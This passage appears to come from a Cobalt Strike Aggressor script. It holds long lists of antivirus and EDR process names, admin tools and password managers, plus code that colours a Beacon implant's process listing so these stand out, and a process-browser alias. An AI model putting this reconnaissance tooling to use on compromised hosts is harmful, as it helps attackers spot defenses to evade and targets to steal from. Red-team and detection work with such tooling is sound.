"RPCServ.exe", "RSSensor.exe", "RTVscan.exe", "RapApp.exe", "Rav.exe", "RavAlert.exe", "RavMon.exe", "RavMonD.exe", "RavService.exe", "RavStub.exe", "RavTask.exe", "RavTray.exe", "RavUpdate.exe", "RavXP.exe", "RealMon.exe", "Realmon.exe", "RedirSvc.exe", "RegMech.exe", "ReporterSvc.exe", "RouterNT.exe", "Rtvscan.exe", "SAFeService.exe", "SAService.exe", "SAVAdminService.exe", "SAVFMSESp.exe", "SAVMain.exe", "SAVScan.exe", "SCANMSG.exe", "SCANWSCS.exe", "SCFManager.exe", "SCFService.exe", "SCFTray.exe", "SDTrayApp.exe", "SEVINST.EXE", "SMEX_ActiveUpdate.exe", "SMEX_Master.exe", "SMEX_RemoteConf.exe", "SMEX_SystemWatch.exe", "SMSECtrl.exe", "SMSELog.exe", "SMSESJM.exe", "SMSESp.exe", "SMSESrv.exe", "SMSETask.exe", "SMSEUI.exe", "SNAC.EXE", "SNAC.exe", "SNDMon.exe", "SNDSrvc.exe", "SPBBCSvc.exe", "SPIDERML.EXE", "SPIDERNT.EXE", "SSM.exe", "SSScheduler.exe", "SVCharge.exe", "SVDealer.exe", "SVFrame.exe", "SVTray.exe", "SWNETSUP.EXE", "SavRoam.exe", "SavService.exe", "SavUI.exe", "ScanMailOutLook.exe", "SeAnalyzerTool.exe", "SemSvc.exe", "SescLU.exe", "SetupGUIMngr.exe", "SiteAdv.exe", "Smc.exe", "SmcGui.exe", "SnHwSrv.exe", "SnICheckAdm.exe", "SnIcon.exe", "SnSrv.exe", "SnicheckSrv.exe", "SpIDerAgent.exe", "SpntSvc.exe", "SpyEmergency.exe", "SpyEmergencySrv.exe", "StOPP.exe", "StWatchDog.exe", "SymCorpUI.exe", "SymSPort.exe", "TBMon.exe", "TFGui.exe", "TFService.exe", "TFTray.exe", "TFun.exe", "TIASPN~1.EXE", "TSAnSrf.exe", "TSAtiSy.exe", "TScutyNT.exe", "TSmpNT.exe", "TmListen.exe", "TmPfw.exe", "Tmntsrv.exe", "Traflnsp.exe", "TrapTrackerMgr.exe", "UPSCHD.exe", "UcService.exe", "UdaterUI.exe", "UmxAgent.exe", "UmxCfg.exe", "UmxFwHlp.exe", "UmxPol.exe", "Up2date.exe", "UpdaterUI.exe", "UrlLstCk.exe", "UserActivity.exe", "UserAnalysis.exe", "UsrPrmpt.exe", "V3Medic.exe", "V3Svc.exe", "VPC32.exe", "VPDN_LU.exe", "VPTray.exe", "VSStat.exe", "VsStat.exe", "VsTskMgr.exe", "WEBPROXY.EXE", "WFXCTL32.EXE", "WFXMOD32.EXE", "WFXSNT40.EXE", "WebProxy.exe", "WebScanX.exe", "WinRoute.exe", "WrSpySetup.exe", "ZLH.exe", "Zanda.exe", "ZhuDongFangYu.exe", "Zlh.exe", "_avp32.exe", "_avpcc.exe", "_avpm.exe", "aAvgApi.exe", "aawservice.exe", "acaif.exe", "acctmgr.exe", "ackwin32.exe", "aclient.exe", "adaware.exe", "advxdwin.exe", "aexnsagent.exe", "aexsvc.exe", "aexswdusr.exe", "aflogvw.exe", "afwServ.exe", "agentsvr.exe", "agentw.exe", "ahnrpt.exe", "ahnsd.exe", "ahnsdsv.exe", "alertsvc.exe", "alevir.exe", "alogserv.exe", "alsvc.exe", "alunotify.exe", "aluschedulersvc.exe", "amon9x.exe", "amswmagt.exe", "anti-trojan.exe", "antiarp.exe", "antivirus.exe", "ants.exe", "aphost.exe", "apimonitor.exe", "aplica32.exe", "aps.exe", "apvxdwin.exe", "arr.exe", "ashAvast.exe", "ashBug.exe", "ashChest.exe", "ashCmd.exe", "ashDisp.exe", "ashEnhcd.exe", "ashLogV.exe", "ashMaiSv.exe", "ashPopWz.exe", "ashQuick.exe", "ashServ.exe", "ashSimp2.exe", "ashSimpl.exe", "ashSkPcc.exe", "ashSkPck.exe", "ashUpd.exe", "ashWebSv.exe", "ashdisp.exe", "ashmaisv.exe", "ashserv.exe", "ashwebsv.exe", "asupport.exe", "aswDisp.exe", "aswRegSvr.exe", "aswServ.exe", "aswUpdSv.exe", "aswUpdsv.exe", "aswWebSv.exe", "aswupdsv.exe", "atcon.exe", "atguard.exe", "atro55en.exe", "atupdater.exe", "atwatch.exe", "atwsctsk.exe", "au.exe", "aupdate.exe", "aupdrun.exe", "aus.exe", "auto-protect.nav80try.exe", "autodown.exe", "autotrace.exe", "autoup.exe", "autoupdate.exe", "avEngine.exe", "avadmin.exe", "avcenter.exe", "avconfig.exe", "avconsol.exe", "ave32.exe", "avengine.exe", "avesvc.exe", "avfwsvc.exe", "avgam.exe", "avgamsvr.exe", "avgas.exe", "avgcc.exe", "avgcc32.exe", "avgcsrvx.exe", "avgctrl.exe", "avgdiag.exe", "avgemc.exe", "avgfws8.exe", "avgfws9.exe", "avgfwsrv.exe", "avginet.exe", "avgmsvr.exe", "avgnsx.exe", "avgnt.exe", "avgregcl.exe", "avgrssvc.exe", "avgrsx.exe", "avgscanx.exe", "avgserv.exe", "avgserv9.exe", "avgsystx.exe", "avgtray.exe", "avguard.exe", "avgui.exe", "avgupd.exe", "avgupdln.exe", "avgupsvc.exe", "avgvv.exe", "avgw.exe", "avgwb.exe", "avgwdsvc.exe", "avgwizfw.exe", "avkpop.exe", "avkserv.exe", "avkservice.exe", "avkwctl9.exe", "avltmain.exe", "avmailc.exe", "avmcdlg.exe", "avnotify.exe", "avnt.exe", "avp.exe", "avp32.exe", "avpcc.exe", "avpdos32.exe", "avpexec.exe", "avpm.exe", "avpncc.exe", "avps.exe", "avptc32.exe", "avpupd.exe", "avscan.exe", "avsched32.exe", "avserver.exe", "avshadow.exe", "avsynmgr.exe", "avwebgrd.exe", "avwin.exe", "avwin95.exe", "avwinnt.exe", "avwupd.exe", "avwupd32.exe", "avwupsrv.exe", "avxmonitor9x.exe", "avxmonitornt.exe", "avxquar.exe", "backweb.exe", "bargains.exe", "basfipm.exe", "bd_professional.exe", "bdagent.exe", "bdc.exe", "bdlite.exe", "bdmcon.exe", "bdss.exe", "bdsubmit.exe", "beagle.exe", "belt.exe", "bidef.exe", "bidserver.exe", "bipcp.exe", "bipcpevalsetup.exe", "bisp.exe", "blackd.exe", "blackice.exe", "blink.exe", "blss.exe", "bmrt.exe", "bootconf.exe", "bootwarn.exe", "borg2.exe", "bpc.exe", "bpk.exe", "brasil.exe", "bs120.exe", "bundle.exe", "bvt.exe", "bwgo0000.exe", "ca.exe", "caav.exe", "caavcmdscan.exe", "caavguiscan.exe", "caf.exe", "cafw.exe", "caissdt.exe", "capfaem.exe", "capfasem.exe", "capfsem.exe", "capmuamagt.exe", "casc.exe", "casecuritycenter.exe", "caunst.exe", "cavrep.exe", "cavrid.exe", "cavscan.exe", "cavtray.exe", "ccApp.exe", "ccEvtMgr.exe", "ccLgView.exe", "ccProxy.exe", "ccSetMgr.exe", "ccSetmgr.exe", "ccSvcHst.exe", "ccap.exe", "ccapp.exe", "ccevtmgr.exe", "cclaw.exe", "ccnfagent.exe", "ccprovsp.exe", "ccproxy.exe", "ccpxysvc.exe", "ccschedulersvc.exe", "ccsetmgr.exe", "ccsmagtd.exe", "ccsvchst.exe", "ccsystemreport.exe", "cctray.exe", "ccupdate.exe", "cdp.exe", "cfd.exe", "cfftplugin.exe", "cfgwiz.exe", "cfiadmin.exe", "cfiaudit.exe", "cfinet.exe", "cfinet32.exe", "cfnotsrvd.exe", "cfp.exe", "cfpconfg.exe", "cfpconfig.exe", "cfplogvw.exe", "cfpsbmit.exe", "cfpupdat.exe", "cfsmsmd.exe", "checkup.exe", "cka.exe", "clamscan.exe", "claw95.exe", "claw95cf.exe", "clean.exe", "cleaner.exe", "cleaner3.exe", "cleanpc.exe", "cleanup.exe", "click.exe", "cmdagent.exe", "cmdinstall.exe", "cmesys.exe", "cmgrdian.exe", "cmon016.exe", "comHost.exe", "connectionmonitor.exe", "control_panel.exe", "cpd.exe", "cpdclnt.exe", "cpf.exe", "cpf9x206.exe", "cpfnt206.exe", "crashrep.exe", "csacontrol.exe", "csinject.exe", "csinsm32.exe", "csinsmnt.exe", "csrss_tc.exe", "ctrl.exe", "cv.exe", "cwnb181.exe", "cwntdwmo.exe", "cz.exe", "datemanager.exe", "dbserv.exe", "dbsrv9.exe", "dcomx.exe", "defalert.exe", "defscangui.exe", "defwatch.exe", "deloeminfs.exe", "deputy.exe", "diskmon.exe", "divx.exe", "djsnetcn.exe", "dllcache.exe", "dllreg.exe", "doors.exe", "doscan.exe", "dpf.exe", "dpfsetup.exe", "dpps2.exe", "drwagntd.exe", "drwatson.exe", "drweb.exe", "drweb32.exe", "drweb32w.exe", "drweb386.exe", "drwebcgp.exe", "drwebcom.exe", "drwebdc.exe", "drwebmng.exe", "drwebscd.exe", "drwebupw.exe", "drwebwcl.exe", "drwebwin.exe", "drwupgrade.exe", "dsmain.exe", "dssagent.exe", "dvp95.exe", "dvp95_0.exe", "dwengine.exe", "dwhwizrd.exe", "dwwin.exe", "ecengine.exe", "edisk.exe", "efpeadm.exe", "egui.exe", "ekrn.exe", "elogsvc.exe", "emet_agent.exe", "emet_service.exe", "emsw.exe", "engineserver.exe", "ent.exe", "era.exe", "esafe.exe", "escanhnt.exe", "escanv95.exe", "esecagntservice.exe", "esecservice.exe", "esmagent.exe", "espwatch.exe", "etagent.exe", "ethereal.exe", "etrustcipe.exe", "evpn.exe", "evtProcessEcFile.exe", "evtarmgr.exe", "evtmgr.exe", "exantivirus-cnet.exe", "exe.avxw.exe", "execstat.exe", "expert.exe", "explore.exe", "f-agnt95.exe", "f-prot.exe", "f-prot95.exe", "f-stopw.exe", "fameh32.exe", "fast.exe", "fch32.exe", "fih32.exe", "findviru.exe", "firesvc.exe", "firetray.exe", "firewall.exe", "fmon.exe", "fnrb32.exe", "fortifw.exe", "fp-win.exe", "fp-win_trial.exe", "fprot.exe", "frameworkservice.exe", "frminst.exe", "frw.exe", "fsaa.exe", "fsaua.exe", "fsav.exe", "fsav32.exe", "fsav530stbyb.exe", "fsav530wtbyb.exe", "fsav95.exe", "fsavgui.exe", "fscuif.exe", "fsdfwd.exe", "fsgk32.exe", "fsgk32st.exe", "fsguidll.exe", "fsguiexe.exe", "fshdll32.exe", "fsm32.exe", "fsma32.exe", "fsmb32.exe", "fsorsp.exe", "fspc.exe", "fspex.exe", "fsqh.exe", "fssm32.exe", "fwinst.exe", "gator.exe", "gbmenu.exe", "gbpoll.exe", "gcascleaner.exe", "gcasdtserv.exe", "gcasinstallhelper.exe", "gcasnotice.exe", "gcasserv.exe", "gcasservalert.exe", "gcasswupdater.exe", "generics.exe", "gfireporterservice.exe", "ghost_2.exe", "ghosttray.exe", "giantantispywaremain.exe", "giantantispywareupdater.exe", "gmt.exe", "guard.exe", "guarddog.exe", "guardgui.exe", "hacktracersetup.exe", "hbinst.exe", "hbsrv.exe", "hipsvc.exe", "hotactio.exe", "hotpatch.exe", "htlog.exe", "htpatch.exe", "hwpe.exe", "hxdl.exe", "hxiul.exe", "iamapp.exe", "iamserv.exe", "iamstats.exe", "ibmasn.exe", "ibmavsp.exe", "icepack.exe", "icload95.exe", "icloadnt.exe", "icmon.exe", "icsupp95.exe", "icsuppnt.exe", "idle.exe", "iedll.exe", "iedriver.exe", "iface.exe", "ifw2000.exe", "igateway.exe", "inetlnfo.exe", "infus.exe", "infwin.exe", "inicio.exe", "init.exe", "inonmsrv.exe", "inorpc.exe", "inort.exe", "inotask.exe", "intdel.exe", "intren.exe", "iomon98.exe", "isPwdSvc.exe", "isUAC.exe", "isafe.exe", "isafinst.exe", "issvc.exe", "istsvc.exe", "jammer.exe", "jdbgmrg.exe", "jedi.exe", "kaccore.exe", "kansgui.exe", "kansvr.exe", "kastray.exe", "kav.exe", "kav32.exe", "kavfs.exe", "kavfsgt.exe", "kavfsrcn.exe", "kavfsscs.exe", "kavfswp.exe", "kavisarv.exe", "kavlite40eng.exe", "kavlotsingleton.exe", "kavmm.exe", "kavpers40eng.exe", "kavpf.exe", "kavshell.exe", "kavss.exe", "kavstart.exe", "kavsvc.exe", "kavtray.exe", "kazza.exe", "keenvalue.exe", "kerio-pf-213-en-win.exe", "kerio-wrl-421-en-win.exe", "kerio-wrp-421-en-win.exe", "kernel32.exe", "killprocesssetup161.exe", "kis.exe", "kislive.exe", "kissvc.exe", "klnacserver.exe", "klnagent.exe", "klserver.exe", "klswd.exe", "klwtblfs.exe", "kmailmon.exe", "knownsvr.exe", "kpf4gui.exe", "kpf4ss.exe", "kpfw32.exe", "kpfwsvc.exe", "krbcc32s.exe", "kvdetech.exe", "kvolself.exe", "kvsrvxp.exe", "kvsrvxp_1.exe", "kwatch.exe", "kwsprod.exe", "kxeserv.exe", "launcher.exe", "ldnetmon.exe", "ldpro.exe", "ldpromenu.exe", "ldscan.exe", "leventmgr.exe", "livesrv.exe", "lmon.exe", "lnetinfo.exe", "loader.exe", "localnet.exe", "lockdown.exe", "lockdown2000.exe", "log_qtine.exe", "lookout.exe", "lordpe.exe", "lsetup.exe", "luall.exe", "luau.exe", "lucallbackproxy.exe", "lucoms.exe", "lucomserver.exe", "lucoms~1.exe", "luinit.exe", "luspt.exe", "makereport.exe", "mantispm.exe", "mapisvc32.exe", "masalert.exe", "massrv.exe", "mcafeefire.exe", "mcagent.exe", "mcappins.exe", "mcconsol.exe", "mcdash.exe", "mcdetect.exe", "mcepoc.exe", "mcepocfg.exe", "mcinfo.exe", "mcmnhdlr.exe", "mcmscsvc.exe", "mcods.exe", "mcpalmcfg.exe", "mcpromgr.exe", "mcregwiz.exe", "mcscript.exe", "mcscript_inuse.exe", "mcshell.exe", "mcshield.exe", "mcshld9x.exe", "mcsysmon.exe", "mctool.exe", "mctray.exe", "mctskshd.exe", "mcuimgr.exe", "mcupdate.exe", "mcupdmgr.exe", "mcvsftsn.exe", "mcvsrte.exe", "mcvsshld.exe", "mcwce.exe", "mcwcecfg.exe", "md.exe", "mfeann.exe", "mfevtps.exe", "mfin32.exe", "mfw2en.exe", "mfweng3.02d30.exe", "mgavrtcl.exe", "mgavrte.exe", "mghtml.exe", "mgui.exe", "minilog.exe", "mmod.exe", "monitor.exe", "monsvcnt.exe", "monsysnt.exe", "moolive.exe", "mostat.exe", "mpcmdrun.exe", "mpf.exe", "mpfagent.exe", "mpfconsole.exe", "mpfservice.exe", "mpftray.exe", "mps.exe", "mpsevh.exe", "mpsvc.exe", "mrf.exe", "mrflux.exe", "msapp.exe", "msascui.exe", "msbb.exe", "msblast.exe", "mscache.exe", "msccn32.exe", "mscifapp.exe", "mscman.exe", "msconfig.exe", "msdm.exe", "msdos.exe", "msiexec16.exe", "mskagent.exe", "mskdetct.exe", "msksrver.exe", "msksrvr.exe", "mslaugh.exe", "msmgt.exe", "msmpeng.exe", "msmsgri32.exe", "msscli.exe", "msseces.exe", "mssmmc32.exe", "msssrv.exe", "mssys.exe", "msvxd.exe", "mu0311ad.exe", "mwatch.exe", "myagttry.exe", "n32scanw.exe", "nSMDemf.exe", "nSMDmon.exe", "nSMDreal.exe", "nSMDsch.exe", "naPrdMgr.exe", "nav.exe", "navap.navapsvc.exe", "navapsvc.exe", "navapw32.exe", "navdx.exe", "navlu32.exe", "navnt.exe", "navstub.exe", "navw32.exe", "navwnt.exe", "nc2000.exe", "ncinst4.exe", "MSASCuiL.exe");
@av1 = @("MBAMService.exe", "mbamtray.exe", "CylanceSvc.exe", "ndd32.exe", "ndetect.exe", "neomonitor.exe", "neotrace.exe", "neowatchlog.exe", "netalertclient.exe", "netarmor.exe", "netcfg.exe", "netd32.exe", "netinfo.exe", "netmon.exe", "netscanpro.exe", "netspyhunter-1.2.exe", "netstat.exe", "netutils.exe", "networx.exe", "ngctw32.exe", "ngserver.exe", "nip.exe", "nipsvc.exe", "nisoptui.exe", "nisserv.exe", "nisum.exe", "njeeves.exe", "nlsvc.exe", "nmain.exe", "nod32.exe", "nod32krn.exe", "nod32kui.exe", "normist.exe", "norton_internet_secu_3.0_407.exe", "notstart.exe", "npf40_tw_98_nt_me_2k.exe", "npfmessenger.exe", "npfmntor.exe", "npfmsg.exe", "nprotect.exe", "npscheck.exe", "npssvc.exe", "nrmenctb.exe", "nsched32.exe", "nscsrvce.exe", "nsctop.exe", "nsmdtr.exe", "nssys32.exe", "nstask32.exe", "nsupdate.exe", "nt.exe", "ntcaagent.exe", "ntcadaemon.exe", "ntcaservice.exe", "ntrtscan.exe", "ntvdm.exe", "ntxconfig.exe", "nui.exe", "nupgrade.exe", "nvarch16.exe", "nvc95.exe", "nvcoas.exe", "nvcsched.exe", "nvsvc32.exe", "nwinst4.exe", "nwservice.exe", "nwtool16.exe", "nymse.exe", "oasclnt.exe", "oespamtest.exe", "ofcdog.exe", "ofcpfwsvc.exe", "okclient.exe", "olfsnt40.exe", "ollydbg.exe", "onsrvr.exe", "op_viewer.exe", "opscan.exe", "optimize.exe", "ostronet.exe", "otfix.exe", "outpost.exe", "outpostinstall.exe", "outpostproinstall.exe", "paamsrv.exe", "padmin.exe", "pagent.exe", "pagentwd.exe", "panixk.exe", "patch.exe", "pavbckpt.exe", "pavcl.exe", "pavfires.exe", "pavfnsvr.exe", "pavjobs.exe", "pavkre.exe", "pavmail.exe", "pavprot.exe", "pavproxy.exe", "pavprsrv.exe", "pavsched.exe", "pavsrv50.exe", "pavsrv51.exe", "pavsrv52.exe", "pavupg.exe", "pavw.exe", "pccNT.exe", "pccclient.exe", "pccguide.exe", "pcclient.exe", "pccnt.exe", "pccntmon.exe", "pccntupd.exe", "pccpfw.exe", "pcctlcom.exe", "pccwin98.exe", "pcfwallicon.exe", "pcip10117_0.exe", "pcscan.exe", "pctsAuxs.exe", "pctsGui.exe", "pctsSvc.exe", "pctsTray.exe", "pdsetup.exe", "pep.exe", "periscope.exe", "persfw.exe", "perswf.exe", "pf2.exe", "pfwadmin.exe", "pgmonitr.exe", "pingscan.exe", "platin.exe", "pmon.exe", "pnmsrv.exe", "pntiomon.exe", "pop3pack.exe", "pop3trap.exe", "poproxy.exe", "popscan.exe", "portdetective.exe", "portmonitor.exe", "powerscan.exe", "ppinupdt.exe", "ppmcativedetection.exe", "pptbc.exe", "ppvstop.exe", "pqibrowser.exe", "pqv2isvc.exe", "prevsrv.exe", "prizesurfer.exe", "prmt.exe", "prmvr.exe", "programauditor.exe", "proport.exe", "protectx.exe", "psctris.exe", "psh_svc.exe", "psimreal.exe", "psimsvc.exe", "pskmssvc.exe", "pspf.exe", "purge.exe", "pview.exe", "pviewer.exe", "pxemtftp.exe", "pxeservice.exe", "qclean.exe", "qconsole.exe", "qdcsfs.exe", "qoeloader.exe", "qserver.exe", "rapapp.exe", "rapuisvc.exe", "ras.exe", "rasupd.exe", "rav7.exe", "rav7win.exe", "rav8win32eng.exe", "ravmon.exe", "ravmond.exe", "ravstub.exe", "ravxp.exe", "ray.exe", "rb32.exe", "rcsvcmon.exe", "rcsync.exe", "realmon.exe", "reged.exe", "remupd.exe", "reportsvc.exe", "rescue.exe", "rescue32.exe", "rfwmain.exe", "rfwproxy.exe", "rfwsrv.exe", "rfwstub.exe", "rnav.exe", "rrguard.exe", "rshell.exe", "rsnetsvr.exe", "rstray.exe", "rtvscan.exe", "rtvscn95.exe", "rulaunch.exe", "saHookMain.exe", "safeboxtray.exe", "safeweb.exe", "sahagent.exescan32.exe", "sav32cli.exe", "save.exe", "savenow.exe", "savroam.exe", "savscan.exe", "savservice.exe", "sbserv.exe", "scam32.exe", "scan32.exe", "scan95.exe", "scanexplicit.exe", "scanfrm.exe", "scanmailoutlook.exe", "scanpm.exe", "schdsrvc.exe", "schupd.exe", "scrscan.exe", "seestat.exe", "serv95.exe", "setloadorder.exe", "setup_flowprotector_us.exe", "setupguimngr.exe", "setupvameeval.exe", "sfc.exe", "sgssfw32.exe", "sh.exe", "shellspyinstall.exe", "shn.exe", "showbehind.exe", "shstat.exe", "siteadv.exe", "smOutlookPack.exe", "smc.exe", "smoutlookpack.exe", "sms.exe", "smsesp.exe", "smss32.exe", "sndmon.exe", "sndsrvc.exe", "soap.exe", "sofi.exe", "softManager.exe", "spbbcsvc.exe", "spf.exe", "sphinx.exe", "spideragent.exe", "spiderml.exe", "spidernt.exe", "spiderui.exe", "spntsvc.exe", "spoler.exe", "spoolcv.exe", "spoolsv32.exe", "spyxx.exe", "srexe.exe", "srng.exe", "srvload.exe", "srvmon.exe", "ss3edit.exe", "sschk.exe", "ssg_4104.exe", "ssgrate.exe", "st2.exe", "stcloader.exe", "stinger.exe", "stopp.exe", "stwatchdog.exe", "supftrl.exe", "support.exe", "supporter5.exe", "svcGenericHost", "svcharge.exe", "svchostc.exe", "svchosts.exe", "svcntaux.exe", "svdealer.exe", "svframe.exe", "svtray.exe", "swdsvc.exe", "sweep95.exe", "sweepnet.sweepsrv.sys.swnetsup.exe", "sweepsrv.exe", "swnetsup.exe", "swnxt.exe", "swserver.exe", "symlcsvc.exe", "symproxysvc.exe", "symsport.exe", "symtray.exe", "symwsc.exe", "sysdoc32.exe", "sysedit.exe", "sysupd.exe", "taskmo.exe", "taumon.exe", "tbmon.exe", "tbscan.exe", "tc.exe", "tca.exe", "tclproc.exe", "tcm.exe", "tdimon.exe", "tds-3.exe", "tds2-98.exe", "tds2-nt.exe", "teekids.exe", "tfak.exe", "tfak5.exe", "tgbob.exe", "titanin.exe", "titaninxp.exe", "tmas.exe", "tmlisten.exe", "tmntsrv.exe", "tmpfw.exe", "tmproxy.exe", "tnbutil.exe", "tpsrv.exe", "tracesweeper.exe", "trickler.exe", "trjscan.exe", "trjsetup.exe", "trojantrap3.exe", "trupd.exe", "tsadbot.exe", "tvmd.exe", "tvtmd.exe", "udaterui.exe", "undoboot.exe", "unvet32.exe", "updat.exe", "updtnv28.exe", "upfile.exe", "upgrad.exe", "uplive.exe", "urllstck.exe", "usergate.exe", "usrprmpt.exe", "utpost.exe", "v2iconsole.exe", "v3clnsrv.exe", "v3exec.exe", "v3imscn.exe", "vbcmserv.exe", "vbcons.exe", "vbust.exe", "vbwin9x.exe", "vbwinntw.exe", "vcsetup.exe", "vet32.exe", "vet95.exe", "vetmsg.exe", "vettray.exe", "vfsetup.exe", "vir-help.exe", "virusmdpersonalfirewall.exe", "vnlan300.exe", "vnpc3000.exe", "vpatch.exe", "vpc32.exe", "vpc42.exe", "vpfw30s.exe", "vprosvc.exe", "vptray.exe", "vrv.exe", "vrvmail.exe", "vrvmon.exe", "vrvnet.exe", "vscan40.exe", "vscenu6.02d30.exe", "vsched.exe", "vsecomr.exe", "vshwin32.exe", "vsisetup.exe", "vsmain.exe", "vsmon.exe", "vsserv.exe", "vsstat.exe", "vstskmgr.exe", "vswin9xe.exe", "vswinntse.exe", "vswinperse.exe", "w32dsm89.exe", "w9x.exe", "watchdog.exe", "webdav.exe", "webproxy.exe", "webscanx.exe", "webtrap.exe", "webtrapnt.exe", "wfindv32.exe", "wfxctl32.exe", "wfxmod32.exe", "wfxsnt40.exe", "whoswatchingme.exe", "wimmun32.exe", "win-bugsfix.exe", "winactive.exe", "winmain.exe", "winnet.exe", "winppr32.exe", "winrecon.exe", "winroute.exe", "winservn.exe", "winssk32.exe", "winstart.exe", "winstart001.exe", "wintsk32.exe", "winupdate.exe", "wkufind.exe", "wnad.exe", "wnt.exe", "wradmin.exe", "wrctrl.exe", "wsbgate.exe", "wssfcmai.exe", "wupdater.exe", "wupdt.exe", "wyvernworksfirewall.exe", "xagt.exe", "xagtnotif.exe", "xcommsvr.exe", "xfilter.exe", "xpf202en.exe", "zanda.exe", "zapro.exe", "zapsetup3001.exe", "zatutor.exe", "zhudongfangyu.exe", "zlclient.exe", "zlh.exe", "zonalm2601.exe", "zonealarm.exe", "cb.exe", "MsMpEng.exe", "MsSense.exe", "CSFalconService.exe", "CSFalconContainer.exe", "redcloak.exe", "OmniAgent.exe","CrAmTray.exe","AmSvc.exe","minionhost.exe","PylumLoader.exe","CrsSvc.exe");
@admin = @("MobaXterm.exe", "bash.exe", "git-bash.exe", "mmc.exe", "Code.exe", "notepad++.exe", "notepad.exe", "cmd.exe", "drwatson.exe", "DRWTSN32.EXE", "drwtsn32.exe", "dumpcap.exe", "ethereal.exe", "filemon.exe", "idag.exe", "idaw.exe", "k1205.exe", "loader32.exe", "netmon.exe", "netstat.exe", "netxray.exe", "NmWebService.exe", "nukenabber.exe", "portmon.exe", "powershell.exe", "PRTG Traffic Gr.exe", "PRTG Traffic Grapher.exe", "prtgwatchdog.exe", "putty.exe", "regmon.exe", "SystemEye.exe", "taskman.exe", "TASKMGR.EXE", "tcpview.exe", "Totalcmd.exe", "TrafMonitor.exe", "windbg.exe", "winobj.exe", "wireshark.exe", "WMonAvNScan.exe", "WMonAvScan.exe", "WMonSrv.exe","regedit.exe", "regedit32.exe", "accesschk.exe", "accesschk64.exe", "AccessEnum.exe", "ADExplorer.exe", "ADInsight.exe", "adrestore.exe", "Autologon.exe", "Autoruns.exe", "Autoruns64.exe", "autorunsc.exe", "autorunsc64.exe", "Bginfo.exe", "Bginfo64.exe", "Cacheset.exe", "Clockres.exe", "Clockres64.exe", "Contig.exe", "Contig64.exe", "Coreinfo.exe", "ctrl2cap.exe", "Dbgview.exe", "Desktops.exe", "disk2vhd.exe", "diskext.exe", "diskext64.exe", "Diskmon.exe", "DiskView.exe", "du.exe", "du64.exe", "efsdump.exe", "FindLinks.exe", "FindLinks64.exe", "handle.exe", "handle64.exe", "hex2dec.exe", "hex2dec64.exe", "junction.exe", "junction64.exe", "ldmdump.exe", "Listdlls.exe", "Listdlls64.exe", "livekd.exe", "livekd64.exe", "LoadOrd.exe", "LoadOrd64.exe", "LoadOrdC.exe", "LoadOrdC64.exe", "logonsessions.exe", "logonsessions64.exe", "movefile.exe", "movefile64.exe", "notmyfault.exe", "notmyfault64.exe", "notmyfaultc.exe", "notmyfaultc64.exe", "ntfsinfo.exe", "ntfsinfo64.exe", "pagedfrg.exe", "pendmoves.exe", "pendmoves64.exe", "pipelist.exe", "pipelist64.exe", "portmon.exe", "procdump.exe", "procdump64.exe", "procexp.exe", "procexp64.exe", "Procmon.exe", "PsExec.exe", "PsExec64.exe", "psfile.exe", "psfile64.exe", "PsGetsid.exe", "PsGetsid64.exe", "PsInfo.exe", "PsInfo64.exe", "pskill.exe", "pskill64.exe", "pslist.exe", "pslist64.exe", "PsLoggedon.exe", "PsLoggedon64.exe", "psloglist.exe", "pspasswd.exe", "pspasswd64.exe", "psping.exe", "psping64.exe", "PsService.exe", "PsService64.exe", "psshutdown.exe", "pssuspend.exe", "pssuspend64.exe", "RAMMap.exe", "RegDelNull.exe", "RegDelNull64.exe", "regjump.exe", "ru.exe", "ru64.exe", "sdelete.exe", "sdelete64.exe", "ShareEnum.exe", "ShellRunas.exe", "sigcheck.exe", "sigcheck64.exe", "streams.exe", "streams64.exe", "strings.exe", "strings64.exe", "sync.exe", "sync64.exe", "Sysmon.exe", "Sysmon64.exe", "Tcpvcon.exe", "Tcpview.exe", "Testlimit.exe", "Testlimit64.exe", "vmmap.exe", "Volumeid.exe", "Volumeid64.exe", "whois.exe", "whois64.exe", "Winobj.exe", "ZoomIt.exe", "KeePass.exe", "1Password.exe", "lastpass.exe");
local('$outps $temp $name $ppid $pid $arch $user $session @ps');
$outps .= "\cC[*]\o Process List with process highlighting\n";
$outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $bd['pid'] ." \o \n";
$outps .= "\cC[*]\o Explorer/Winlogon: \c2 BLUE \o \n";
$outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n";
$outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n";
$outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n";
$outps .= " PID PPID Name Arch Session User\n";
$outps .= "\cE --- ---- ---- ---- ------- -----\n";
foreach $temp (split("\n", ["$2" trim])) {
($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp);
# highlight AV processes in RED.
if(iff($name in @av,true,false)) {
push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight current process in YELLOW
} else if ($pid eq $bd['pid']) {
push(@ps, %(pid => $pid, entry => "\c8 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight explorer , winlogon in BLUE
} else if ($name eq "explorer.exe" || $name eq "winlogon.exe") {
push(@ps, %(pid => $pid, entry => "\c2 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight browsers processes in GREEN
} else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe" || $name eq "MicrosoftEdgeCP.exe" || $name eq "MicrosoftEdge.exe") {
push(@ps, %(pid => $pid, entry => "\c3 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight av1 processes in RED.
} else if(iff($name in @av1,true,false)) {
push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
# highlight Admin Tools in Light Blue
} else if(iff($name in @admin,true,false)) {
push(@ps, %(pid => $pid, entry => "\cB $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
} else {
push(@ps, %(pid => $pid, entry => " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user"));
}
}
# sort the processes please
sort({ return $1['pid'] <=> $2['pid']; }, @ps);
# append to our outstring
foreach $temp (@ps) {
$outps .= "$temp['entry'] \n";
}
return $outps;
}
#author bluescreenofjeff
#alias for "pspane" to open the process browser pane for the current Beacon
#register help
beacon_command_register("pspane", "open process browser pane",
"Synopsis: pspane \n\n" .
"Open the process browser pane for the current Beacon.");
#setting the alias
alias pspane {
binput($1,"ps");
openProcessBrowser($1);
}
#author: bluescreenofjeff
# increases the sleep interval on all Beacons when there are no operators logged in
